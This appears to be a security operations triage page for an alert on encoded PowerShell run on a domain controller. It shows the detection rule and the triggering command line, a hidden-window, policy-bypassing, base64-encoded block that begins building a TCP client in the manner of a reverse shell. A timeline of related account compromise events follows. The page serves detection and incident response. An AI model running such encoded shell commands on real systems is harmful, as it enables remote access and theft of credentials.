Triage queue
// Operations

Encoded PowerShell executed on WIN-DC01

PowerShell ran a base64-encoded command block with a hidden window on a domain controller.

ALT-664EB4HighInvestigating
81Elevated

This alert has been escalated. Open the incident to see the full case.

Why this fired

Rule: Encoded PowerShell execution

Any event where processName contains powershell and commandLine contains -enc

PowerShell invoked with a base64-encoded command block, a common wrapper for staged payloads that defeats plaintext command inspection.

Triggering event

The exact record that satisfied the rule.

Process ExecutionHigh2026-09-04 14:36:29ZCrowdStrike Falcon
Encoded PowerShell command block executed with hidden window and execution policy bypass
powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAA=

What else was happening

Other activity for jsmith in the surrounding hour.

TimeEventSeverityHost
2026-09-04 14:17:53ZAuthentication FailureLowWIN-DC01
2026-09-04 14:21:05ZAuthentication FailureLowWIN-DC01
2026-09-04 14:24:17ZAuthentication FailureLowWIN-DC01
2026-09-04 14:27:29ZAuthentication SuccessHighWIN-DC01
2026-09-04 14:30:29ZMfa Method RemovedHighWIN-DC01
2026-09-04 14:33:29ZUser CreatedCriticalWIN-DC01
2026-09-04 14:39:29ZCredential AccessCriticalWIN-DC01

Alert

Raised
7d ago
Last updated
7d ago
Risk score
81
Source
CrowdStrike Falcon
Detected by
Correlation rule

Entity risk

94Severe

jsmith carries a standing risk score derived from all of its activity, not just this alert.

Open the entity profile

Pivot